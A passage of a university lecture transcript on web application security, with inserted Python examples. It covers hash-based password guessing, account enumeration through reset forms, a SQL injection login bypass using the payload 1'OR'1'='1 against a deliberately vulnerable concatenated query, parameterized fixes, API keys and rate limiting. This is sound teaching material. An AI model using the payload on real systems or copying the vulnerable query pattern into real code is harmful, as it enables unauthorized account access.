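        for user, digest in stolen_hashes.items()
        if digest in lookup
    }


# Hypothetical leaked table: one common password, one unusual one.
stolen = {
    "anushree": sha256_hex("hello"),
    "elle": sha256_hex("kV9#tq2!mZr8"),
}
found = guess_passwords(stolen, ["password", "12345", "hello"])
```

Here `found` contains only the account whose password appeared in the guess list. A commonly used mitigation, which goes beyond what is covered here, is to add a per-user salt and a deliberately slow hash so that one precomputed table cannot be reused across accounts.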
708 00:31:08,610 --> 00:31:12,110 So another possible way the databases could be insecure, 709 00:31:12,110 --> 00:31:16,610 we might have vulnerabilities inside of the security of our database, 710 00:31:16,610 --> 00:31:20,330 is thinking about what information might be leaked by our database. 711 00:31:20,330 --> 00:31:22,970 What information can get out when we don't want it to get out? 712 00:31:22,970 --> 00:31:26,240 And can anyone see a potential vulnerability here, 713 00:31:26,240 --> 00:31:27,740 in terms of information leakage? 714 00:31:27,740 --> 00:31:30,740 Information that might be exposed that we might otherwise not want 715 00:31:30,740 --> 00:31:34,550 exposed, just from a user interface like this that people can use? 716 00:31:34,550 --> 00:31:37,938 717 00:31:37,938 --> 00:31:43,784 AUDIENCE: Your email address might be exposed as it's going over the web. 718 00:31:43,784 --> 00:31:44,450 BRIAN YU: Great. 719 00:31:44,450 --> 00:31:46,380 So your email address is potentially exposed 720 00:31:46,380 --> 00:31:48,070 as it's traveling from one point to another. 721 00:31:48,070 --> 00:31:50,570 Although, with HTTPS and trying to encrypt that information, 722 00:31:50,570 --> 00:31:52,730 usually we can help to defend against that. 723 00:31:52,730 --> 00:31:55,370 But certainly the idea of typing in an email address 724 00:31:55,370 --> 00:31:59,420 and clicking on reset password leads to potential information leakage 725 00:31:59,420 --> 00:32:00,830 in other potential ways. 
726 00:32:00,830 --> 00:32:04,400 Whereby if I type in an email address of my account 727 00:32:04,400 --> 00:32:06,250 that I've perhaps forgotten my password to, 728 00:32:06,250 --> 00:32:09,208 or a friend's account that I think they've forgotten their password to, 729 00:32:09,208 --> 00:32:11,819 potentially, and I click Reset Password, then 730 00:32:11,819 --> 00:32:14,360 I might see a notification that very reasonably might just say, 731 00:32:14,360 --> 00:32:17,330 password reset email sent. 732 00:32:17,330 --> 00:32:21,320 What if I typed in the email address of someone who 733 00:32:21,320 --> 00:32:23,302 didn't have an account on the website? 734 00:32:23,302 --> 00:32:25,010 What might you expect this website to do? 735 00:32:25,010 --> 00:32:29,020 736 00:32:29,020 --> 00:32:29,520 Yeah? 737 00:32:29,520 --> 00:32:30,430 AUDIENCE: Give you an error message. 738 00:32:30,430 --> 00:32:31,610 BRIAN YU: Should give you an error of some sort. 739 00:32:31,610 --> 00:32:34,760 Something like, error, there is no such user with that email address. 740 00:32:34,760 --> 00:32:38,000 And now that we've seen those two screens, you type in an email address 741 00:32:38,000 --> 00:32:41,390 and sometimes you get password reset email sent and sometimes you get error, 742 00:32:41,390 --> 00:32:43,460 there is no user with that email address. 743 00:32:43,460 --> 00:32:46,210 Where is the potential information leakage here? 744 00:32:46,210 --> 00:32:46,710 Yeah? 745 00:32:46,710 --> 00:32:48,668 AUDIENCE: It could figure out who the users are 746 00:32:48,668 --> 00:32:49,964 by trying out different emails. 747 00:32:49,964 --> 00:32:50,630 BRIAN YU: Great. 748 00:32:50,630 --> 00:32:53,000 Now, by using this screen, even if I don't know people's passwords, 749 00:32:53,000 --> 00:32:55,940 I can figure out who has an account with this website and who doesn't, right?
750 00:32:55,940 --> 00:32:58,731 If it's a bank, for instance, and I type in someone's email address 751 00:32:58,731 --> 00:33:01,280 and I get this screen, password reset email sent, 752 00:33:01,280 --> 00:33:04,560 now I know that this particular user has an account with this bank. 753 00:33:04,560 --> 00:33:07,717 And that might not be something that your application wants to expose. 754 00:33:07,717 --> 00:33:09,800 And so as you go about designing web applications, 755 00:33:09,800 --> 00:33:12,000 you always want to be bearing these things in mind. 756 00:33:12,000 --> 00:33:15,800 Thinking about what information from the database is being exposed 757 00:33:15,800 --> 00:33:18,560 and how might information that I don't want to be exposed, 758 00:33:18,560 --> 00:33:20,720 might be exposed to users that I don't want 759 00:33:20,720 --> 00:33:22,190 to have access to that information. 760 00:33:22,190 --> 00:33:24,200 And certainly this is one potential example 761 00:33:24,200 --> 00:33:26,502 that maybe you don't really care if your users are 762 00:33:26,502 --> 00:33:29,210 able to know if other people have accounts on the website or not. 763 00:33:29,210 --> 00:33:33,320 But maybe in a place where it's more sensitive or more secure about 764 00:33:33,320 --> 00:33:35,960 whether or not a user has an account on the website or not, 765 00:33:35,960 --> 00:33:37,280 this might be something you do care about. 766 00:33:37,280 --> 00:33:39,071 And you'd want to think carefully about how 767 00:33:39,071 --> 00:33:41,840 you design the user interface, about how users are interacting 768 00:33:41,840 --> 00:33:43,673 with the database, and whether or not you're 769 00:33:43,673 --> 00:33:46,130 ever exposing information that you don't want 770 00:33:46,130 --> 00:33:49,524 to ultimately be exposed to the user. 771 00:33:49,524 --> 00:33:50,690 Questions about any of that? 772 00:33:50,690 --> 00:33:53,498 773 00:33:53,498 --> 00:33:54,910 OK. 
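One way to avoid the account-existence leak discussed above is to show the same message whether or not the address belongs to a user. The sketch below assumes that design choice, which is one common approach and not the only one; `registered_emails`, `outbox`, and `request_password_reset` are hypothetical names, and appending to `outbox` stands in for actually sending an email.

```python
# Hypothetical stand-ins for the users table and the outgoing mail queue.
registered_emails = {"alice@example.com"}
outbox = []

GENERIC_MESSAGE = (
    "If an account exists for that address, a password reset email has been sent."
)


def request_password_reset(email: str) -> str:
    """Queue a reset email for real accounts, but reply identically either way."""
    if email in registered_emails:
        outbox.append(email)  # a real application would send the email here
    # The response never reveals whether the address was found.
    return GENERIC_MESSAGE


known = request_password_reset("alice@example.com")
unknown = request_password_reset("mallory@example.com")
```

Because `known` and `unknown` are identical, someone probing the form with many addresses learns nothing from the response text about who has an account.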
774 00:33:54,910 --> 00:33:57,470 So now moving onto the topic about SQL and vulnerabilities 775 00:33:57,470 --> 00:34:00,850 that we did talk about a couple weeks ago, and namely that was SQL injection. 776 00:34:00,850 --> 00:34:04,640 And does anyone recall what SQL injection is and why it's a problem? 777 00:34:04,640 --> 00:34:05,420 Yeah? 778 00:34:05,420 --> 00:34:09,454 AUDIENCE: So in a SQL web class, we added or condition. 779 00:34:09,454 --> 00:34:10,120 BRIAN YU: Great. 780 00:34:10,120 --> 00:34:12,969 We were able to add an or condition, or more generally, 781 00:34:12,969 --> 00:34:17,210 just some sort of SQL code into input for instance, 782 00:34:17,210 --> 00:34:21,280 and get our own SQL code to run on someone else's server. 783 00:34:21,280 --> 00:34:24,760 So we were able to effectively do whatever we wanted with the database 784 00:34:24,760 --> 00:34:28,090 because we could run arbitrary SQL queries on that database. 785 00:34:28,090 --> 00:34:30,760 And so the example we looked at, which we'll 786 00:34:30,760 --> 00:34:33,100 look at an actual Flask example of that today, 787 00:34:33,100 --> 00:34:36,389 is a user name and password field where we 788 00:34:36,389 --> 00:34:38,139 might use that information on the back end 789 00:34:38,139 --> 00:34:40,389 to run a SQL query that looks something like this. 790 00:34:40,389 --> 00:34:43,510 Select star from users where user name equals 791 00:34:43,510 --> 00:34:47,590 whatever the user name was and password equals whatever the password was. 
792 00:34:47,590 --> 00:34:50,984 And we imagine that if a user logs in, like Alice with the password hello, 793 00:34:50,984 --> 00:34:53,650 then we'd end up running a query that looks something like this, 794 00:34:53,650 --> 00:34:57,320 substituting in Alice as the username, hello as the password, 795 00:34:57,320 --> 00:35:00,310 and now we're selecting from all the users where Alice is the username 796 00:35:00,310 --> 00:35:01,670 and hello is the password. 797 00:35:01,670 --> 00:35:05,770 And if there is a matching one, then this will return a row, and otherwise, 798 00:35:05,770 --> 00:35:06,312 it won't. 799 00:35:06,312 --> 00:35:08,020 And of course, in this case, the password 800 00:35:08,020 --> 00:35:10,380 is not hashed, though in a more secure system, 801 00:35:10,380 --> 00:35:14,710 we might want to hash that password first and then run this query. 802 00:35:14,710 --> 00:35:16,490 But what might go wrong here? 803 00:35:16,490 --> 00:35:20,350 So we talked about what would happen if someone types in Alice as the user name 804 00:35:20,350 --> 00:35:27,760 and something like this as the password, 1'OR'1'='1, which seems sort 805 00:35:27,760 --> 00:35:31,510 of complicated, but the result of that was that when we plugged everything 806 00:35:31,510 --> 00:35:37,000 in, now we're selecting from users where the user name is Alice and the password 807 00:35:37,000 --> 00:35:38,650 is 1-- which it isn't-- 808 00:35:38,650 --> 00:35:41,200 or the string 1 equals the string 1. 809 00:35:41,200 --> 00:35:44,720 Well, this is, of course, true, and now we're going to get some row back. 810 00:35:44,720 --> 00:35:46,720 And so how might that actually work in practice? 811 00:35:46,720 --> 00:35:50,740 Let's take a look at a web application that implements this very idea of just 812 00:35:50,740 --> 00:35:53,590 a very simple login system where an exploit like this 813 00:35:53,590 --> 00:35:57,500 can help anyone get access to any other user account. 
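The substitution just described can be reproduced in a few lines. This is a sketch under stated assumptions, not the lecture's application: it uses Python's built-in `sqlite3` module with an in-memory table, and `build_query` is a hypothetical helper that pastes input into the SQL text the unsafe way.

```python
import sqlite3

# In-memory database with one user, mirroring the Alice / hello example.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'hello')")


def build_query(username, password):
    """UNSAFE: user input is pasted directly into the SQL text."""
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


honest = build_query("alice", "hello")
wrong = build_query("alice", "goodbye")
attack = build_query("alice", "1' OR '1' = '1")

honest_row = db.execute(honest).fetchone()  # matches Alice's row
wrong_row = db.execute(wrong).fetchone()    # no match, so None
attack_row = db.execute(attack).fetchone()  # OR '1' = '1' makes the WHERE clause true
```

Printing `attack` shows that the quote characters in the password close the string literal early, which is what lets the OR condition become part of the query itself.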
814 00:35:57,500 --> 00:36:03,790 So let's take a look at injection and application.py. 815 00:36:03,790 --> 00:36:09,430 So this is just a Flask application, and our default route, 816 00:36:09,430 --> 00:36:14,169 this index route, first checks if there is a username inside of the session. 817 00:36:14,169 --> 00:36:16,460 If there is a user name in the session, in other words, 818 00:36:16,460 --> 00:36:18,480 if someone is logged into this current session, 819 00:36:18,480 --> 00:36:21,710 we'll go ahead and render a user.html page that will just display 820 00:36:21,710 --> 00:36:23,750 who's currently logged in for instance. 821 00:36:23,750 --> 00:36:25,750 Otherwise, if there is no user, then we're 822 00:36:25,750 --> 00:36:29,380 going to go ahead and render a login.html page that would give people 823 00:36:29,380 --> 00:36:32,410 the option to log into this website. 824 00:36:32,410 --> 00:36:37,220 And now, let's take a look at what's happening inside of the login function. 825 00:36:37,220 --> 00:36:42,220 So first thing we're doing is someone logs in by submitting a post request 826 00:36:42,220 --> 00:36:43,870 to /login. 827 00:36:43,870 --> 00:36:47,170 Then we get the user name by going request.form.get("username"). 828 00:36:47,170 --> 00:36:49,710 We get the password by request.form.get("password"), 829 00:36:49,710 --> 00:36:51,979 just extracting that information from the form. 830 00:36:51,979 --> 00:36:53,770 We're going to print out what the query is. 831 00:36:53,770 --> 00:36:55,670 You'll see an example of that in a moment, 832 00:36:55,670 --> 00:36:57,220 but this isn't strictly necessary. 833 00:36:57,220 --> 00:36:59,590 The interesting thing is here, on line 33. 
834 00:36:59,590 --> 00:37:03,040 We're running db.execute, running a database query, and saying, 835 00:37:03,040 --> 00:37:06,340 select star from users where username equals 836 00:37:06,340 --> 00:37:08,810 and then plugging in the username here, and password 837 00:37:08,810 --> 00:37:11,560 equals, plugging in the password there, and then 838 00:37:11,560 --> 00:37:15,070 just getting the first row that comes back from that. 839 00:37:15,070 --> 00:37:18,100 And if a row does come back from that, if the query was successful, 840 00:37:18,100 --> 00:37:21,130 then we log the user in by storing them inside the session 841 00:37:21,130 --> 00:37:23,840 and redirecting them back to the index page. 842 00:37:23,840 --> 00:37:27,970 Otherwise, we render the login page again, saying invalid=True, 843 00:37:27,970 --> 00:37:30,790 meaning there was some authentication problem. 844 00:37:30,790 --> 00:37:33,280 So that's all fairly straightforward. 845 00:37:33,280 --> 00:37:35,757 And of course, the key vulnerability to look at here 846 00:37:35,757 --> 00:37:38,590 is the fact that whatever the username and whatever the password are, 847 00:37:38,590 --> 00:37:40,900 we just plug them straight into the SQL query 848 00:37:40,900 --> 00:37:45,530 by just using string concatenation in Python to join this all together. 849 00:37:45,530 --> 00:37:53,830 So now if I were to run this Flask application and take this URL 850 00:37:53,830 --> 00:37:56,890 and go to that URL, I'm faced with this login form.
851 00:37:56,890 --> 00:37:58,700 And I can type in Alice-- 852 00:37:58,700 --> 00:38:01,690 and normally you would want your password field 853 00:38:01,690 --> 00:38:05,652 to use dots by setting the input type to be password so nobody can see it, 854 00:38:05,652 --> 00:38:08,110 but for the sake of example, so you can see what I'm doing, 855 00:38:08,110 --> 00:38:10,540 I've changed the password field to just be a text field so you can 856 00:38:10,540 --> 00:38:12,190 see what password is being typed in. 857 00:38:12,190 --> 00:38:15,240 But of course, you would never actually want to do that in practice. 858 00:38:15,240 --> 00:38:18,010 But if I type hello as the password, which is Alice's password, 859 00:38:18,010 --> 00:38:19,980 and click Submit, now I'm logged in as Alice. 860 00:38:19,980 --> 00:38:21,850 It says, Welcome, alice. 861 00:38:21,850 --> 00:38:23,744 And you can check by looking at the log. 862 00:38:23,744 --> 00:38:24,910 Here's what got printed out. 863 00:38:24,910 --> 00:38:26,170 Here was the query that ran. 864 00:38:26,170 --> 00:38:30,190 Select star from users, where username equals Alice and password equals hello, 865 00:38:30,190 --> 00:38:32,580 and of course, that returned back Alice as my one row, 866 00:38:32,580 --> 00:38:34,980 and so that was all good. 867 00:38:34,980 --> 00:38:36,510 I'll log out now. 868 00:38:36,510 --> 00:38:39,790 If I try logging in with Alice with a fake password, goodbye, 869 00:38:39,790 --> 00:38:41,920 which is not the correct password, and Submit, 870 00:38:41,920 --> 00:38:44,050 I get Error, invalid credentials. 871 00:38:44,050 --> 00:38:44,565 Why is that? 872 00:38:44,565 --> 00:38:45,940 Well, here is the query that ran. 873 00:38:45,940 --> 00:38:50,620 Select star from users, where user name is Alice and password equals goodbye. 874 00:38:50,620 --> 00:38:53,160 Well, that's not going to return any results.
875 00:38:53,160 --> 00:38:56,230 But of course, the injection attack happens if I type user name Alice, 876 00:38:56,230 --> 00:39:06,157 or user name, any user name that I want, and type in 1'OR'1'='1, like that, 877 00:39:06,157 --> 00:39:09,240 where now if I submit that, no matter who the user is, now I see, Welcome, 878 00:39:09,240 --> 00:39:09,740 alice. 879 00:39:09,740 --> 00:39:12,750 I've logged into this user's account, and why did that happen? 880 00:39:12,750 --> 00:39:14,250 Well, here's the query that was run. 881 00:39:14,250 --> 00:39:19,440 Select star from users where username equals Alice and password equals 1 or 1 882 00:39:19,440 --> 00:39:20,040 equals 1. 883 00:39:20,040 --> 00:39:23,700 So by injecting arbitrary SQL logic into this code, 884 00:39:23,700 --> 00:39:26,854 I was able to gain access to any user account that I wanted to. 885 00:39:26,854 --> 00:39:28,770 And that's why it's very important, when we're 886 00:39:28,770 --> 00:39:32,640 using SQL and running SQL queries, that we're careful to avoid SQL injection. 887 00:39:32,640 --> 00:39:35,940 That any time user input is being put into a query, 888 00:39:35,940 --> 00:39:38,820 we want to escape any potential characters that 889 00:39:38,820 --> 00:39:42,090 might be part of a SQL query in order to make sure 890 00:39:42,090 --> 00:39:44,520 that nobody can just run whatever SQL queries 891 00:39:44,520 --> 00:39:46,710 they want to inside of our code. 892 00:39:46,710 --> 00:39:49,380 And SQLAlchemy, which you may have been using in Python in order 893 00:39:49,380 --> 00:39:51,720 to do some of this stuff, automatically takes 894 00:39:51,720 --> 00:39:54,210 care of doing some of that escaping for you, 895 00:39:54,210 --> 00:39:56,940 if you're passing in the parameters in a Python dictionary 896 00:39:56,940 --> 00:39:58,980 for instance, which you might have done before. 897 00:39:58,980 --> 00:40:02,980 And so that's certainly something you can use as well.
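Passing parameters in a dictionary, as mentioned above, can be illustrated without SQLAlchemy. The sketch below assumes Python's built-in `sqlite3` module rather than the lecture's setup; it uses named placeholders (`:username`, `:password`) so the driver treats the input strictly as data. `find_user` is a hypothetical helper, and the password is stored unhashed only to mirror the example in the lecture.

```python
import sqlite3

# In-memory database with one user, mirroring the Alice / hello example.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'hello')")


def find_user(username, password):
    """Look up a user with bound parameters instead of string concatenation."""
    query = ("SELECT * FROM users "
             "WHERE username = :username AND password = :password")
    # The dictionary values are bound by the driver, never spliced into the SQL.
    params = {"username": username, "password": password}
    return db.execute(query, params).fetchone()


ok_row = find_user("alice", "hello")               # the real credentials match
attack_row = find_user("alice", "1' OR '1' = '1")  # compared as a literal string
```

Here the injected text is compared against the stored password as an ordinary string, so the lookup finds no row and the login would be rejected.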
898 00:40:02,980 --> 00:40:05,490 Questions about SQL vulnerabilities? 899 00:40:05,490 --> 00:40:08,910 Whether it was reasons why we might want to use hashed passwords inside 900 00:40:08,910 --> 00:40:11,655 of our database or how we might accidentally leak information, 901 00:40:11,655 --> 00:40:15,060 as via that forgot your password page, or as 902 00:40:15,060 --> 00:40:18,090 to how we might have gone about using SQL injection 903 00:40:18,090 --> 00:40:20,370 to gain access to unauthorized data. 904 00:40:20,370 --> 00:40:23,730 905 00:40:23,730 --> 00:40:25,250 OK. 906 00:40:25,250 --> 00:40:27,770 Next up, before we take our break, was about APIs. 907 00:40:27,770 --> 00:40:31,130 So we were thinking about Application Programming Interfaces, the idea 908 00:40:31,130 --> 00:40:34,670 that people could write APIs for their web applications 909 00:40:34,670 --> 00:40:39,406 that let people programmatically gain access to information about whatever it 910 00:40:39,406 --> 00:40:41,030 is that your website is designed to do. 911 00:40:41,030 --> 00:40:42,980 So in the case of book reviews, maybe you 912 00:40:42,980 --> 00:40:45,962 had an API route that returned the reviews for a particular book. 913 00:40:45,962 --> 00:40:48,170 But you might imagine that other sites might give you 914 00:40:48,170 --> 00:40:49,550 API routes that do other things. 915 00:40:49,550 --> 00:40:51,383 We didn't do this for project three, but you 916 00:40:51,383 --> 00:40:55,160 might imagine that in a restaurant, for instance, that had a website, 917 00:40:55,160 --> 00:40:58,340 you might have an API route that gives you back your orders, for instance. 918 00:40:58,340 --> 00:41:01,832 What security considerations should go into designing APIs? 919 00:41:01,832 --> 00:41:03,290 Or what could potentially go wrong? 920 00:41:03,290 --> 00:41:05,932 921 00:41:05,932 --> 00:41:07,890 Broad questions, so lots of possibilities here. 
922 00:41:07,890 --> 00:41:15,330 923 00:41:15,330 --> 00:41:18,310 AUDIENCE: You can expose stuff that shouldn't be exposed. 924 00:41:18,310 --> 00:41:20,685 BRIAN YU: You can expose stuff that shouldn't be exposed. 925 00:41:20,685 --> 00:41:23,140 So that's an interesting idea, that if I, for instance, 926 00:41:23,140 --> 00:41:27,840 had an API for being able to look at my Amazon orders or look at the food 927 00:41:27,840 --> 00:41:30,090 that I've ordered from a restaurant in particular, 928 00:41:30,090 --> 00:41:32,940 I would want that to somehow only be accessible to me 929 00:41:32,940 --> 00:41:34,810 and not accessible to someone else. 930 00:41:34,810 --> 00:41:38,340 And so how would we implement this idea of some people 931 00:41:38,340 --> 00:41:41,070 should be able to access certain information by the API, 932 00:41:41,070 --> 00:41:44,040 and other people should not be able to access that information 933 00:41:44,040 --> 00:41:49,180 and should only be able to access some other pieces of information? 934 00:41:49,180 --> 00:41:50,247 AUDIENCE: Authentication. 935 00:41:50,247 --> 00:41:51,580 BRIAN YU: Authentication, great. 936 00:41:51,580 --> 00:41:54,910 We can use what are commonly known as API keys, which are just 937 00:41:54,910 --> 00:41:57,940 strings of text that are associated with a particular user, 938 00:41:57,940 --> 00:42:00,460 effectively like a password, but for APIs. 939 00:42:00,460 --> 00:42:02,472 Such that in order to make an API request, 940 00:42:02,472 --> 00:42:04,180 you not only need to submit your request, 941 00:42:04,180 --> 00:42:06,370 but you also need to submit your API key. 942 00:42:06,370 --> 00:42:09,200 And then it's on the web application to check that key, to say, 943 00:42:09,200 --> 00:42:13,490 does this key have permission to look at the things that it's trying to look at? 
944 00:42:13,490 --> 00:42:15,370 And this is the idea of route authentication, 945 00:42:15,370 --> 00:42:17,860 that if someone makes an API request to a particular route, 946 00:42:17,860 --> 00:42:21,310 you better first make sure that whoever is making that request has permission 947 00:42:21,310 --> 00:42:24,710 to see whatever they're asking to see before you actually show it to them. 948 00:42:24,710 --> 00:42:26,890 And so API keys can be used for that as well. 949 00:42:26,890 --> 00:42:29,200 In addition, they're often used for rate limiting, 950 00:42:29,200 --> 00:42:32,116 where if you're worried about someone overusing an API 951 00:42:32,116 --> 00:42:34,990 or abusing your server by making thousands upon thousands of requests 952 00:42:34,990 --> 00:42:37,090 in a short period of time, you can rate limit 953 00:42:37,090 --> 00:42:40,060 and say, well, I only want you to be able to make 954 00:42:40,060 --> 00:42:42,440 x number of requests per hour. 955 00:42:42,440 --> 00:42:44,770 And if you have an API key, then it's pretty easy 956 00:42:44,770 --> 00:42:47,520 to implement this idea of rate limiting because all you have to do 957 00:42:47,520 --> 00:42:50,410 is keep track inside of a table somewhere that this API key 958 00:42:50,410 --> 00:42:54,220 has used 28 requests in the last hour, so they're hitting up on their limit. 959 00:42:54,220 --> 00:42:56,320 And so if they use any more, we should just 960 00:42:56,320 --> 00:42:59,890 stop allowing them to use the API key until it refreshes for the next hour, 961 00:42:59,890 --> 00:43:00,850 for instance.
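The key check and the per-hour counter described above might look roughly like the following. This is a sketch with assumptions throughout: the key `key-abc123`, the limit of 30 requests per hour, and the in-memory `usage` dictionary (standing in for the table mentioned in the lecture) are all hypothetical, and it uses a simple fixed window rather than any particular library's rate limiter.

```python
import time

API_KEYS = {"key-abc123": "alice"}  # hypothetical key -> owner mapping
LIMIT_PER_HOUR = 30                 # hypothetical limit
WINDOW_SECONDS = 3600
usage = {}                          # key -> (window_start, request_count)


def check_request(api_key, now=None):
    """Return (status_code, message) for a request carrying this API key."""
    now = time.time() if now is None else now
    if api_key not in API_KEYS:
        return 401, "invalid API key"
    window_start, count = usage.get(api_key, (now, 0))
    if now - window_start >= WINDOW_SECONDS:
        # The hour has passed, so the counter refreshes.
        window_start, count = now, 0
    if count >= LIMIT_PER_HOUR:
        return 429, "rate limit exceeded"
    usage[api_key] = (window_start, count + 1)
    return 200, "ok"
```

A route handler would call `check_request` before doing any work and return early on anything other than 200. Deciding whether a valid key may see a particular resource is a separate check that would follow it.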
962 00:43:00,850 --> 00:43:05,170 And so in your project, you might not have needed to use an API key, 963 00:43:05,170 --> 00:43:08,500 but anytime you want to deal with potentially authenticated data 964 00:43:08,500 --> 00:43:11,950 or you want to rate limit, then you'll want to think about using an API key 965 00:43:11,950 --> 00:43:14,350 like you did have to use with the Goodreads API 966 00:43:14,350 --> 00:43:17,110 in order to take advantage of features like rate 967 00:43:17,110 --> 00:43:19,180 limiting or authenticating particular routes 968 00:43:19,180 --> 00:43:21,700 to make sure that only certain users have the ability 969 00:43:21,700 --> 00:43:24,490 to access particular routes. 970 00:43:24,490 --> 00:43:27,350 Questions about that? 971 00:43:27,350 --> 00:43:27,850 All right. 972 00:43:27,850 --> 00:43:30,110 In that case, we'll take a short break and when we come back, 973 00:43:30,110 --> 00:43:33,160 we'll take a look at JavaScript and look at the many different kinds of security 974 00:43:33,160 --> 00:43:35,110 vulnerabilities that come about when we start 975 00:43:35,110 --> 00:43:39,057 introducing JavaScript and client-side code into our web applications. 976 00:43:39,057 --> 00:43:41,860 977 00:43:41,860 --> 00:43:42,760 Welcome back. 978 00:43:42,760 --> 00:43:45,370 So we're at about the midway point in the course, 979 00:43:45,370 --> 00:43:47,320 and then we started to talk about JavaScript. 980 00:43:47,320 --> 00:43:49,690 And so JavaScript, if you recall, was the language 981 00:43:49,690 --> 00:43:51,537 that we were using in order to write code 982 00:43:51,537 --> 00:43:54,370 on the client side, code that was actually running inside the user's 983 00:43:54,370 --> 00:43:57,640 browser and not on the server where Flask or Django was running, 984 00:43:57,640 --> 00:43:58,540 for instance. 985 00:43:58,540 --> 00:44:02,272 And this leads to a whole new host of potential security vulnerabilities.
986 00:44:02,272 --> 00:44:03,730 So let's start to chat about these. 987 00:44:03,730 --> 00:44:05,377 What could go wrong? 988 00:44:05,377 --> 00:44:07,210 What sorts of exploits could happen, can you 989 00:44:07,210 --> 00:44:10,830 think of, when we start to introduce JavaScript into the equation? 990 00:44:10,830 --> 00:44:13,350 Code that can run inside the user's browser. 991 00:44:13,350 --> 00:44:14,514 Yeah? 992 00:44:14,514 --> 00:44:18,820 AUDIENCE: When we [INAUDIBLE] information, [INAUDIBLE] even that it 993 00:44:18,820 --> 00:44:19,981 can change. 994 00:44:19,981 --> 00:44:28,430 Like someone's address [INAUDIBLE] that changing someone's 995 00:44:28,430 --> 00:44:33,484 address to someone else and using JavaScript [INAUDIBLE].. 996 00:44:33,484 --> 00:44:34,150 BRIAN YU: Great. 997 00:44:34,150 --> 00:44:36,760 So JavaScript has all these event handlers that we've talked about, 998 00:44:36,760 --> 00:44:39,130 whether on load or on click, that can do various things. 999 00:44:39,130 --> 00:44:41,837 And potentially, if someone clicks on something in code that 1000 00:44:41,837 --> 00:44:43,670 does something malicious that's able to run, 1001 00:44:43,670 --> 00:44:45,670 it can make something potentially bad happen. 1002 00:44:45,670 --> 00:44:48,610 And we'll take a look at at least one example of that definitely 1003 00:44:48,610 --> 00:44:50,286 later on today. 1004 00:44:50,286 --> 00:44:52,160 Other things that could potentially go wrong? 1005 00:44:52,160 --> 00:44:54,618 There are a lot of potential security vulnerabilities here. 1006 00:44:54,618 --> 00:44:56,210 So let's just toss out some ideas. 1007 00:44:56,210 --> 00:45:00,642 1008 00:45:00,642 --> 00:45:02,350 What would we want to avoid happening now 1009 00:45:02,350 --> 00:45:05,110 that we have JavaScript code that can run inside the browser? 
1010 00:45:05,110 --> 00:45:09,022 1011 00:45:09,022 --> 00:45:15,974 AUDIENCE: Someone might redirect from the site you're on to another site. 1012 00:45:15,974 --> 00:45:16,640 BRIAN YU: Great. 1013 00:45:16,640 --> 00:45:18,620 Certainly, someone might try and redirect from the site 1014 00:45:18,620 --> 00:45:19,828 you're on to some other site. 1015 00:45:19,828 --> 00:45:22,850 That we've looked at ways that we can use JavaScript in order 1016 00:45:22,850 --> 00:45:25,170 to redirect someone from one place to another. 1017 00:45:25,170 --> 00:45:27,800 And if we're not careful, that JavaScript code 1018 00:45:27,800 --> 00:45:30,860 might be able to redirect the user to someplace that the user doesn't 1019 00:45:30,860 --> 00:45:32,090 necessarily want to be. 1020 00:45:32,090 --> 00:45:35,760 And so we'll definitely look at an example of that later on, too. 1021 00:45:35,760 --> 00:45:37,870 So that's definitely one potential vulnerability. 1022 00:45:37,870 --> 00:45:38,370 Yeah? 1023 00:45:38,370 --> 00:45:41,529 AUDIENCE: So like with HTML and CSS, it was all static, just 1024 00:45:41,529 --> 00:45:42,656 like what a user sees. 1025 00:45:42,656 --> 00:45:44,364 But with JavaScript, you can actually use 1026 00:45:44,364 --> 00:45:46,632 it to run code on someone's machine. 1027 00:45:46,632 --> 00:45:51,980 So if you write a malicious code, you can [INAUDIBLE] someone's computer. 1028 00:45:51,980 --> 00:45:52,730 BRIAN YU: Exactly. 1029 00:45:52,730 --> 00:45:55,700 So with HTML and CSS, we didn't really need 1030 00:45:55,700 --> 00:45:58,490 to have to worry about code actually running for the most part 1031 00:45:58,490 --> 00:46:00,770 because it was just here's the way that things look. 
1032 00:46:00,770 --> 00:46:03,767 And certainly we were able to use that to try and trick users 1033 00:46:03,767 --> 00:46:06,350 by creating a link that looked like it went to Bank of America 1034 00:46:06,350 --> 00:46:09,030 but actually went to my version of some different site. 1035 00:46:09,030 --> 00:46:11,540 But when it comes to JavaScript, now we really 1036 00:46:11,540 --> 00:46:16,130 have the potential for malicious code to be running on the user's web browser. 1037 00:46:16,130 --> 00:46:18,950 And so how does that code get to the user's web browser? 1038 00:46:18,950 --> 00:46:24,500 How does malicious code enter into some other seemingly benign site, 1039 00:46:24,500 --> 00:46:27,322 and why might those be potential exploits? 1040 00:46:27,322 --> 00:46:30,530 So where we'll start is by looking at one potential JavaScript exploit, which 1041 00:46:30,530 --> 00:46:33,240 is quite common, called cross-site scripting. 1042 00:46:33,240 --> 00:46:35,450 Where the idea of cross-site scripting is 1043 00:46:35,450 --> 00:46:38,300 that we're going to try and look for a vulnerability 1044 00:46:38,300 --> 00:46:41,220 where we can-- in the same way that in the SQL case, 1045 00:46:41,220 --> 00:46:45,890 we were able to inject whatever SQL code we wanted into being run on a database, 1046 00:46:45,890 --> 00:46:49,355 a malicious user, if they are able to send the right link to the right person 1047 00:46:49,355 --> 00:46:51,230 and get them to click on a link for instance, 1048 00:46:51,230 --> 00:46:55,820 are able to get some arbitrary JavaScript code to run inside 1049 00:46:55,820 --> 00:46:57,700 of the user's web browser. 1050 00:46:57,700 --> 00:47:00,952 And so let's take a look at a very simple Flask application. 1051 00:47:00,952 --> 00:47:03,410 This is in fact, the entire Flask application, the contents 1052 00:47:03,410 --> 00:47:05,930 of application.py, for example. 
